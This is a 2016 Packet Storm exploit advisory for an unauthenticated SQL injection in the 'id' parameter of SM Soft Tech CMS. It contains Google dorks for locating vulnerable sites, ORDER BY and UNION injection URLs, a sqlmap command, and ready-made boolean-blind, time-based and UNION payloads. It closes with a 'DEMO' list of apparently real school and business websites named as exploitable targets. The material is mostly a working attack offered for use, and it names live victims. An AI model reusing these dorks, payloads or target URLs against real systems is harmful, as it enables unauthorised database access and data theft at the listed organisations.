SM Soft Tech CMS 1.0 SQL Injection

2016-03-27T00:00:00
ID PACKETSTORM:136441
Type packetstorm
Reporter Shelesh Rauthan
Modified 2016-03-27T00:00:00

Description

                                        
                                            `==========================================================  
[+] Title :- SM SOFT TECH CMS - SQL INJECTION  
[+] Date :- 24 - MAR - 2016  
[+] Vendor Homepage :- http://www.smsofttech.net/  
[+] Version :- All Versions  
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows  
[+] Category :- webapps  
[+] Google Dorks :- "Developed by SM SOFT TECH"  
"Design & Developed by SM SOFT TECH" +inurl:/.php?id=  
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)  
[+] Team name :- Team Alastor Breeze, Intelligent-Exploit  
[+] Official Website :- intelligentexploit.com  
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k  
[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha  
[+] Contact :- indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com  
  
=========================================================  
[+] Severity Level :- High  
  
[+] Request Method(s) :- GET / POST  
  
[+] Vulnerable Parameter(s) :- id  
  
[+] Affected Area(s) :- Entire admin, database, Server  
  
[+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error  
  
[+] SQL vulnerable File :- /home/***/domains/XXX.edu.bd/public_html/event-details.php  
  
[+] POC :- http://127.0.0.1/event-details.php?id=[SQL]'  
  
The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction.  
  
  
http://www.[WEBSITE].com/event-details.php?id=4' order by [SQL IN4JECTION]--+  
http://www.[WEBSITE].com/event-details.php?id=4' union all select [SQL INJECTION]--+  
  
SQLMap  
++++++++++++++++++++++++++  
python sqlmap.py --url "http://127.0.0.1/XXX.php?id=[SQL]" --dbs  
++++++++++++++++++++++++++  
---  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=1' AND 8467=8467 AND 'iGHF'='iGHF  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)  
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))PhJR) AND 'cmRt'='cmRt  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 9 columns  
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71707a7671,0x5758774b584a7345496f,0x7170786b71),NULL,NULL,NULL,NULL--  
---  
  
[+] DEMO :- http://orbitcreditsc.com/event-details.php?id=4'  
http://www.asrahs.edu.bd/event-details.php?id=1'  
http://afi.edu.bd/notice.php?id=6'  
http://bakaliahighschool.edu.bd/event-details.php?id=1'  
http://www.ijmafurniture.com/preview.php?id=33'  
http://www.fbm.edu.bd/notice.php?id=6'  
  
  
  
=======================================================  
`